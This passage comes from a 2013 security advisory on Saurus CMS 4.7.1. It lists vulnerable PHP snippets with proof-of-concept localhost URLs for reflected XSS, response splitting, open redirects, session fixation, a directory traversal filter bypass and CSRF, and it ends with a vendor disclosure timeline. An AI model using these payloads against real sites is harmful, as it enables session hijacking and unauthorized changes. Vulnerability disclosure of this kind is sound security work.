javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
30. Reflected XSS in "admin/user_management.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. all user-supplied parameters (excluding "selected_devices")
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/user_management.php" line 138:
------------------------[ source code start ]----------------------------------
foreach($site->fdat as $fdat_field=>$fdat_value) {
if($fdat_field != 'selected_devices'){
echo '<input type=hidden id="selectform_'.$fdat_field.'"
name="'.$fdat_field.'" value="'.$fdat_value.'">';
}
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/user_management.php?foobar="><script>alert(123);</script>

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
31. Reflected XSS in "admin/permissions.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "selected_group", "user_id", "group_id" and "role_id"
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/permissions.php" line 229:
------------------------[ source code start ]----------------------------------
<input type=hidden id="selectform_selected_group" name="selected_group"
value="<?=$site->fdat['selected_group']?>">
<input type=hidden id="selectform_user_id" name="user_id"
value="<?=$site->fdat['user_id']?>">
<input type=hidden id="selectform_group_id" name="group_id"
value="<?=$site->fdat['group_id']?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/permissions.php?selected_group="><script>alert(123);</script>
http://localhost/saurus471/admin/permissions.php?user_id="><script>alert(123);</script>
http://localhost/saurus471/admin/permissions.php?group_id="><script>alert(123);</script>
http://localhost/saurus471/admin/permissions.php?role_id="><script>alert(123);</script>


Result:

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
32. Reflected XSS in "admin/file_source.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied GET parameter "selected_group"
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/file_source.php" line 47:
------------------------[ source code start ]----------------------------------
$callback = (string)$_GET['callback'];
...
<?=$callback;?>("<?=str_replace(array('"', "
", "
"),
array('"', '
', '
'), $fcontent);?>");
------------------------[ source code end ]------------------------------------

Test (parameter "file" must be valid):

http://localhost/saurus471/admin/file_source.php?file=public/test.php&callback=alert(123);//

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
33. Reflected XSS in "admin/change_config.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "flt_keel" and "group"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/change_config.php" line 1220:
------------------------[ source code start ]----------------------------------
<input type=hidden name=flt_keel value="<?=$site->fdat['flt_keel']?>">
...
<input type="hidden" name="group" value="<?=$site->fdat['group']?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/change_config.php?group=1&flt_keel="><script>alert(123);</script>
http://localhost/saurus471/admin/change_config.php?group="><script>alert(123);</script>

Result:

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
34. Reflected XSS in "admin/forms.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "form_id"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/forms.php" line 222:
------------------------[ source code start ]----------------------------------
if($site->fdat['op'] == 'delete' && $site->fdat['form_id']) {
...
<input type=hidden name=form_id value="<?=$site->fdat['form_id']?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/forms.php?op=delete&form_id="><script>alert(123);</script>


Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
35. Reflected XSS in "admin/lang_file.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "flt_keel" and "keel_id"
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/lang_file.php" line 204:
------------------------[ source code start ]----------------------------------
$keel_id = isset($site->fdat[flt_keel]) ? $site->fdat[flt_keel] : $site->fdat[keel_id];
...
<input type=hidden name=keel_id value="<?=$keel_id ?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/lang_file.php?op=import&flt_keel="><script>alert(123);</script>
http://localhost/saurus471/admin/lang_file.php?op=import&keel_id="><script>alert(123);</script>


Result:

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
36. Reflected XSS in "admin/select_group.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. all user-supplied parameters (excluding "selected_devices")
Preconditions:
1. logged in as Saurus CMS admin


Php script "admin/select_group.php" line 442:
------------------------[ source code start ]----------------------------------
foreach($site->fdat as $fdat_field=>$fdat_value) {
if($fdat_field != 'selected_devices'){
echo '<input type=hidden id="selectform_'.$fdat_field.'"
name="'.$fdat_field.'" value="'.$fdat_value.'">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/select_group.php?foobar="><script>alert(123);</script>

Result:

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
37. HTTP Response Splitting and insecure redirection in "redirect.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "url"
Preconditions:
1. php version < 4.4.2 or < 5.1.2


Php script "redirect.php" line 100:
------------------------[ source code start ]----------------------------------
if($_GET['url'])
{
$url = urldecode($_GET['url']);
//prevent Response Splitting attack
$url = preg_replace("!
|
.*!s", "", $url);

header('Location: '.$_GET['url']);
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/redirect.php?url=war%0d%0axe

Result (using php 5.3.24):

Warning: Header may not contain more than a single header, new line detected in
C:apache_wwwsaurus471
edirect.php on line 106

Test:

http://localhost/saurus471/redirect.php?url=http://php.net/

Result:

successful redirection


###############################################################################
38. HTTP Response Splitting and insecure redirection in "editor/redirect.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "url"
Preconditions:
1. php version < 4.4.2 or < 5.1.2


Php script "editor/redirect.php" line 100:
------------------------[ source code start ]----------------------------------
if($_GET['url'])
{
$url = urldecode($_GET['url']);
//prevent Response Splitting attack
$url = preg_replace("!
|
.*!s", "", $url);

header('Location: '.$_GET['url']);
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/editor/redirect.php?url=war%0d%0axe

Result (using php 5.3.24):

Warning: Header may not contain more than a single header, new line detected in
C:apache_wwwsaurus471editor
edirect.php on line 106

Test:

http://localhost/saurus471/editor/redirect.php?url=http://php.net/

Result:

successful redirection


###############################################################################
39. HTTP Response Splitting in "idcard/index.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET and POST parameters "targeturl"
Preconditions:
1. HTTPS connection needed ("SSLRequireSSL" directive in ".htaccess" file)
2. php version < 4.4.2 or < 5.1.2


Php script "idcard/index.php" line 9:
------------------------[ source code start ]----------------------------------
if($_GET['targeturl']) { $targeturl = '?target_url='.$_GET['targeturl']; }
elseif($_POST['targeturl']) { $targeturl = '?target_url='.$_POST['targeturl']; }


header('Location: ../idcard.php'.$targeturl);
------------------------[ source code end ]------------------------------------


###############################################################################
40. HTTP Response Splitting in "admin/lang_file.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "flt_keel" and "keel_id"
Preconditions:
1. php version < 4.4.2 or < 5.1.2
2. logged in as Saurus CMS admin


Php script "admin/lang_file.php" line 44:
------------------------[ source code start ]----------------------------------
$keel_id = isset($site->fdat[flt_keel]) ? $site->fdat[flt_keel] : $site->fdat[keel_id];
...
if ($site->fdat['op'] == 'export' && $site->fdat['op2'] == 'salvesta'){

header("Content-Disposition: attachment; filename="language".$keel_id.".csv"");
------------------------[ source code end ]------------------------------------

Tests:

http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&flt_keel=%0d%0a
http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&keel_id=%0d%0a

Result (using php 5.3.24, from errorlog):

Header may not contain more than a single header, new line detected


###############################################################################
41. HTTP Response Splitting in "admin/publish.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "url"
Preconditions:
1. php version < 4.4.2 or < 5.1.2
2. logged in as Saurus CMS user with publish privileges


Php script "admin/publish.php" line 118:
------------------------[ source code start ]----------------------------------
header("Location: ".(empty($_SERVER['HTTPS']) ? 'http://' : 'https://').$site->CONF[hostname].$site->fdat[url]);
------------------------[ source code end ]------------------------------------


###############################################################################
42. HTTP Response Splitting in "add_comment.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameters "tpl", "c_tpl", "id", "redirect_url"
Preconditions:
1. php version < 4.4.2 or < 5.1.2


Php script "add_comment.php" line 135:
------------------------[ source code start ]----------------------------------
header('Location: '.urldecode(preg_replace("!
|
.*!s", "", $_POST['redirect_url'])).'&lisa_alert=2');
...
header('Location: '.(empty($_SERVER['HTTPS']) ? 'http://':
'https://').$site->CONF['hostname'].$site->CONF['wwwroot'].
($site->in_editor?'/editor':'').'/?'.(($site->fdat['tpl'] ||
$site->fdat['c_tpl'])&&!$site->fdat['inserted_id']&&
!$site->fdat['jump_to_parent']?'tpl='.$site->fdat['tpl'].
'&c_tpl='.$site->fdat['c_tpl'].'&':'').'id='.$site->fdat['id'].'&lisa_alert=2');
...
if ($site->fdat['output_device'] == 'pda') {
if (strlen($site->fdat['text']) < 2 || strlen($site->fdat['nimi']) < 2) {
myRedirect($site->fdat['redirect_url']);
...
header("Location: ".urldecode($site->fdat['redirect_url']));
...
function myRedirect($url) {
...
header("Location: " . urldecode($url));
}
------------------------[ source code end ]------------------------------------


###############################################################################
43. Information leakage in "admin/check_requirements.php"
###############################################################################

Reason: insufficient access control

Test:

http://localhost/saurus471/admin/check_requirements.php

Result:

Simple GET request as shown above reveals some information about web server:
MySQL version, Webserver version, PHP version, multiple php setting values,
multiple directory permissions. Anyone can access this diagnostic script, no
access control exist.


###############################################################################
44. Session Fixation vulnerability in "admin/ajax_response.php"
###############################################################################

Attack vector:
1. user-supplied POST parameter "PHPSESSID"
Preconditions: none

Some years ago PHP session fixation attacks were easy to exploit: just add
PHPSESSID=112233445566 to URI and done. Modern PHP versions are more secure by
default: PHP setting "session.use_only_cookies" defaults to "1" since 5.3.0,
"session.use_trans_sid" defaults to "0". So even if PHP-based web application
does have session fixation vulnerability, many real world installations are hard
to exploit. Now let's look at Saurus CMS source code.

Php script "admin/ajax_response.php" line 27:
------------------------[ source code start ]----------------------------------
if(isset($_POST['PHPSESSID']))
{
session_id($_POST['PHPSESSID']);
session_start();
}
------------------------[ source code end ]------------------------------------

We can see, that user-submitted POST parameter PHPSESSID is used as argument for
PHP function "session_id()", which is followed by "session_start()". It means,
that even if "session.use_only_cookies=1" and "session.use_trans_sid=0", session
fixation attacks are possible.

Test:

<html><body><center>
<form action="http://localhost/saurus471/admin/ajax_response.php" method="post">
<input type="hidden" name="PHPSESSID" value="1122334455667788">
<input type="submit" value="Test">
</form>
</center></body></html>

Press "Test button" and then observe server response:

HTTP/1.1 200 OK
Date: Wed, 05 Jun 2013 10:26:19 GMT
Server: Apache/2.2.22 (Win32) DAV/2 mod_ssl/2.2.22 OpenSSL/0.9.8t
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=1122334455667788; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/javascript

Now log in as Saurus CMS admin and look for session cookies:

GET /saurus471/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: logged=1; PHPSESSID=1122334455667788
Connection: keep-alive

We can see, that after authentication session ID does not change, which indicates
Session Fixation vulnerability existence.

Solution: implement session ID renewal after successful user authentication.


###############################################################################
45. Directory Traversal vulnerability in "admin/ajax_response.php"
###############################################################################

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "name"
Preconditions:
1. logged in as valid Saurus CMS user
Result: logged in Saurus CMS user can test existence of arbitrary files on
remote server filesystem.


Php script "admin/ajax_response.php" line 52:
------------------------[ source code start ]----------------------------------
// check if a file exists
if($site->user->user_id && $_REQUEST['op'] == 'check_file' && $site->fdat['name'])
{
include_once($class_path.'adminpage.inc.php');

$pathinfo = str_replace(array('../', './', '..', '.'), '', $site->fdat['name']);
$pathinfo = explode('/', $pathinfo);
$filename = create_alias_from_string($pathinfo[count($pathinfo) - 1],true);
unset($pathinfo[count($pathinfo) - 1]);
$dirname = implode('/', $pathinfo);

if(file_exists($site->absolute_path.$dirname.'/'.$filename))
{
echo '{"file_exists": 1}';
}
else
{
echo '{"file_exists": 0}';
}
------------------------[ source code end ]------------------------------------

As seen above, php function "str_replace()" is used for filtering out possible
directory traversal substrings. Such filtering is not secure enough and can be
bypassed with specially crafted parameter "name".


Test 1:

http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/foobar.txt

Result: {"file_exists": 0}

Test 2:

http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/test.txt

Result: {"file_exists": 1}


###############################################################################
46. Cross-Site Request Forgery in "admin/trash.php"
###############################################################################

Reason:
1. missing CSRF token checks
Result:
1. Unauthorized deletion of objects from Recycle Bin


Php script "admin/trash.php" line 85:
------------------------[ source code start ]----------------------------------
if($site->fdat['delete_all'] && count($site->fdat['objects']))
{
//empty trash
for($i = count($site->fdat['objects']) - 1; $i >= 0; $i--)
{
foreach($site->fdat['objects'][$i] as $object_id => $values) if($object_id)
{
$delete_objs = new Alamlist(array(
'parent' => $object_id,
'klass' => $classes,
));

while($object = $delete_objs->next())
{
$object->del();
------------------------[ source code end ]------------------------------------

As seen above, there is no protection against CSRF.

Test:

http://localhost/saurus471/admin/trash.php?delete_all=1&objects[]=1

Result (from sitelog): "Recycle Bin emptied"

Solution: use "verify_form_token()" function in critical places


###############################################################################
47. Cross-Site Request Forgery in "admin/change_config.php"
###############################################################################

Reason:
1. missing CSRF token checks
Result:
1. Unauthorized modification of site configuration


Php script "admin/change_config.php" line 85:
------------------------[ source code start ]----------------------------------
if ($site->fdat[salvesta]==1) {
foreach ($site->fdat as $key=>$value) {

if ( substr ($key, 0, 4) == "cff_" ) {
$sql = $site->db->prepare("UPDATE config SET sisu=? WHERE nimi=?", $value, substr ($key, 4));
$sth = new SQL($sql);
------------------------[ source code end ]------------------------------------

We can see, that there is no protection against CSRF.

Tests:

http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=0
http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=1

Result:

Saurus CMS configuration setting "save_error_log" has been changed

Solution: use "verify_form_token()" function in critical places


###############################################################################
48. Cross-Site Request Forgery in "admin/forms.php"
###############################################################################

Reason:
1. missing CSRF token checks
Result:
1. Unauthorized deletion of forms


Php script "admin/forms.php" line 137:
------------------------[ source code start ]----------------------------------
if($site->fdat['op2'] == 'deleteconfirmed' && $site->fdat['form_id']) {

# delete form
$sql = $site->db->prepare("DELETE FROM forms WHERE form_id=?",$site->fdat['form_id']);
$sth = new SQL($sql);
------------------------[ source code end ]------------------------------------

We can see, that there is no protection against CSRF.

Test:

http://localhost/saurus471/admin/forms.php?op2=deleteconfirmed&form_id=5

Result (from sitelog): "Form 'testform' deleted"

Solution: use "verify_form_token()" function in critical places


###############################################################################
49. Full Path Disclosure in multiple scripts
###############################################################################

Preconditions:
1. PHP setting "display_errors = On"

Tests:

http://localhost/saurus471/admin/edit_object.php

Fatal error: Call to a member function msg() on a non-object in
C:apache_wwwsaurus471adminedit_object.php on line 1299

http://localhost/saurus471/admin/edit_pilt.php

Fatal error: Class 'Timer' not found in
C:apache_wwwsaurus471adminedit_pilt.php on line 21

http://localhost/saurus471/admin/templates.php

Fatal error: Call to a member function msg() on a non-object in
C:apache_wwwsaurus471admin emplates.php on line 57


Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

06.06.2013 -> First email to vendor
06.06.2013 -> First response email from vendor
06.06.2013 -> Sending detailed information to vendor
07.06.2013 -> Vendor started fixing found problems
21.06.2013 -> Found problems are fixed
14.07.2013 -> Current advisory released


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------









Copyright © by Waraxe IT Security Portal All Right Reserved.

Published on: 2013-07-14 (23141 reads)

[ Go Back ]
Top members by posts
waraxe  waraxe - 2407
vince213333  vince213333 - 737
pexli  pexli - 665
Mullog  Mullog - 540
demon  demon - 485
shai-tan  shai-tan - 477
LINUX  LINUX - 404
Cyko  Cyko - 375
tsabitah  tsabitah - 328
y3dips  y3dips - 281
Cybercrime news
When You Pay A Ransom And The Decryptor Doesn't Work
Crypto Scams Rake In $5.6B A Year For Lowlifes, FBI Says
Cisco Merch Shoppers Stung In Magecart Attack
Planned Parenthood Confirms Attack Claimed By RansomHub
Russian Doppelganger Campaign Exposed
FBI: North Korea Aggressively Hacking Cryptocurrency Firms
RansomHub Claims 210 Victims In Just 6 Months
US Government Issues Advisory On Ransomware Group Blamed For Halliburton Cyberattack
Cybercrime And Sabotage Cost German Firms $300 Billion In Past Year
Hunters International Ransomware Gang Threatens To Leak US Marshals Data
EDR Killer Ransomware: What It Is, How To Repel
Cisco Calls For UN To Revisit Cybercrime Convention
Digital Wallets Can Allow Purchases With Stolen Credit Cards
Russian Sells Almost 3,000 Logins, Gets 40 Months In Jail
Kimble To Be Extradited From New Zealand After 12 Year Fight With US
Dispossessor Ransomware Group Shut Down By US, EU Authorities
Ransomware Attack Cost LoanDepot $27 Million
Police Recover $40 Million Stolen In Business Email Scam
Proton Ransomware Evolves With Latest Zola Variant
Billion Dollar Bust As Op Shutters Cryptonator Wallet
UK Cops Shut Down Global Call Spoofing Outlet That Scammed 170k-Plus Victims
Company Paid Record-Breaking $75 Million To Ransomware Group
Global Cops Power Down World's Most Prolific DDoS Dealership
Malware Scammers Gearing Up For 2024 Summer Olympics
FIN7 Is Peddling EDR-Nerfing Malware To Ransomware Operators
Hacker news
Chinese Hackers Linked To Syndicate Arrested In Singapore
Hacker Steals Data On 300k From Avis
When You Pay A Ransom And The Decryptor Doesn't Work
NPD Breach Underscores The Need For Stronger Digital Identities
Microsoft Says Windows Update Zero-Day Being Exploited To Undo Security Fixes
Electronic Payment Firm Slim CD Notifies 1.7M Customers Of Data Breach
Crypto Scams Rake In $5.6B A Year For Lowlifes, FBI Says
Cisco Merch Shoppers Stung In Magecart Attack
Predator Spyware Resurfaces With Fresh Infrastructure
New RAMBO Attack Allows Air-Gapped Data Theft Via RAM Radio Signals
Recent SonicWall Firewall Vuln Exploited In The Wild
Russian Doppelganger Campaign Exposed
White House's New Fix For Cyber Job Gaps: Serve The Nation In Infosec
North Korean Hackers Target Job Seekers With Fake App
Colorado Tops List Of Cyberattacks Per Capita In The US
Cicada Ransomware May Be A BlackCat/ALPHV Rebrand And Upgrade
FBI: North Korea Aggressively Hacking Cryptocurrency Firms
Transport For London Confirms Cyberattack
Intel Responds To SGX Hacking Research
Halliburton Says Hackers Removed Data In Cyberattack
Hacker Leaks Data Of 390 Million Users From VK, A Russian Social Network
Novel Attack On Windows Spotted In Phishing Campaign
RansomHub Claims 210 Victims In Just 6 Months
Researcher Sued For Sharing Data Stolen By Ransomware With Media
Tired Of Airport Security Queues? SQL Inject Yourself Into The Cockpit, Claims Reseachers
Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.128 Seconds